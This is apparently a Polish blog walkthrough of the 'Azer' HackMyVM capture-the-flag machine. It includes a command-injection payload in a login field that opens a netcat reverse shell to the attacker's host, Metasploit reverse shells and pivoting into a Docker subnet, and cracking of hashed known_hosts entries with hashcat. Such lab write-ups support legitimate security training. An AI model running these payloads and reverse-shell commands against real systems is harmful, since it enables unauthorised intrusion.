Marcin

Marcin

Zajmuję się komputerami od lat 90. (XX wieku). Najpierw był C64, potem Amiga, a od 25 lat PC. Tematy tutaj poruszane będą różne, ale głównie związane z IT i wycieczkami rowerowymi.

Azer - tasiyanci

00. Metainfo

Title: Azer
Author: tasiyanci
Release date: 2024-02-24
Download from: HackMyVM
Level: Easy
System: Linux
You’ll learn: Nc, Docker, ssh-known_hosts

01. Scan

netdiscover -r 172.16.1.0 -P
# _____________________________________________________________________________
#   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
# -----------------------------------------------------------------------------
# 172.16.1.221    08:00:27:44:27:df      1      60  PCS Systemtechnik GmbH

02. Db_nmap

export IP=172.16.1.221

msf6 > db_nmap 172.16.1.221
# [*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-26 17:46 CET
# [*] Nmap: Nmap scan report for azer.lan (172.16.1.221)
# [*] Nmap: Host is up (0.0015s latency).
# [*] Nmap: Not shown: 998 closed tcp ports (reset)
# [*] Nmap: PORT     STATE SERVICE
# [*] Nmap: 80/tcp   open  http
# [*] Nmap: 3000/tcp open  ppp
# [*] Nmap: MAC Address: 08:00:27:44:27:DF (Oracle VirtualBox virtual NIC)
#[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

03. Curl and Nc

Nc

root@kali2023:~/hmv/azer# nc -lvp 12345
# listening on [any] 12345 ...
# connect to [172.16.1.89] from azer.lan [172.16.1.221] 37340
script /dev/null -c bash
# Script started, output log file is '/dev/null'.
azer@azer:~$ ^Z
#[1]+  Stopped             nc -lvp 12345
root@kali2023:~/hmv/azer# stty raw -echo;fg
azer@azer:~$ export TERM=xterm-256color
azer@azer:~$ stty rows 44 columns 185
azer@azer:~$ source /etc/skel/.bashrc
azer@azer:~$ export SHELL=bash

Curl

curl "$IP:3000/login" -d "username=anyuser&password=;nc -c bash 172.16.1.89 12345"

04. Docker

azer@azer:~$ ifconfig br-333bcb432cd5
# br-333bcb432cd5: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
#         inet 10.10.10.1  netmask 255.255.255.0  broadcast 10.10.10.255

azer@azer:~$ ps -efw | grep containerd-shim-runc | grep -v grep
# root         808       1  0 11:32 ?        00:00:01 /usr/bin/containerd-shim-runc-v2 -namespace moby -id a882ee87a64178db21b2950d2a22276231dd5835fb89325b36358f1b158b679b -address /run/containerd/containerd.sock

05. known_hosts (optional)

Bash

#Kerszi II.2024

if [ $# -ne 1 ]; then 
echo "Usage: kh-converter.sh <known_hosts file>"; exit
fi

read IP SALT <<< $(awk -F"|" '{IP_=$3;split ($4,array,"[[:space:]]"); print IP_" "array[1]}' $1)
SALT=$(echo -n $SALT | base64 -d | xxd -p)
IP=$(echo -n $IP | base64 -d | xxd -p)
echo $SALT:$IP

root@kali2023:~/hmv/azer# ./kh-converter.sh known_hosts 
# 4290cd4beec55ae10889aac39e621a3fcb37cd06:040c17649cb2e705905179fbdc533e9d33714d4d

Powershell

.\hashcat.exe -a3 --quiet -O -m160 --hex-salt .\hashe\azer.hash .\masks\ipv4_hcmask.hcmask
# 4290cd4beec55ae10889aac39e621a3fcb37cd06:040c17649cb2e705905179fbdc533e9d33714d4d:10.10.10.10

05. Enumerate ip

Metasploit

# [*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > run -j
# [*] Exploit running as background job 0.
# [*] Exploit completed, but no session was created.

# [*] Started reverse TCP handler on 172.16.1.89:4444 
# msf6 exploit(multi/handler) > [*] Command shell session 1 opened (172.16.1.89:4444 -> 172.16.1.221:34326) at 2024-02-26 19:32:53 +0100

msf6 exploit(multi/handler) > sessions -u 1
# [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

# [*] Upgrading session ID: 1
# [*] Starting exploit/multi/handler
# [*] Started reverse TCP handler on 172.16.1.89:4433 
# [*] Sending stage (1017704 bytes) to 172.16.1.221
# [*] Meterpreter session 2 opened (172.16.1.89:4433 -> 172.16.1.221:34100) at 2024-02-26 19:33:25 +0100
# [*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp 
msf6 auxiliary(scanner/portscan/tcp) > route add 10.10.10.0/24 2
# [*] Route added
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 10.10.10.0/24     # if You know ip You can set 10.10.10.10
# rhosts => 10.10.10.0/24
msf6 auxiliary(scanner/portscan/tcp) > set ports  22-25,80,110-900
# ports => 22-25,80,110-900
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 100
# THREADS => 100
msf6 auxiliary(scanner/portscan/tcp) > run

# [+] 10.10.10.1:           - 10.10.10.1:80 - TCP OPEN
# [+] 10.10.10.10:          - 10.10.10.10:80 - TCP OPEN

Azer Host

azer@azer:~$ nc -c bash 172.16.1.89 4444 &
# [1] 1071

05. root

# azer@azer:~$ curl 10.10.10.10:80
azer@azer:~$ curl 10.10.10.10:80
# .:.**********.:.

su - root
# .:.**********.:.

Zostaw komentarz

Także może Ci się spodobać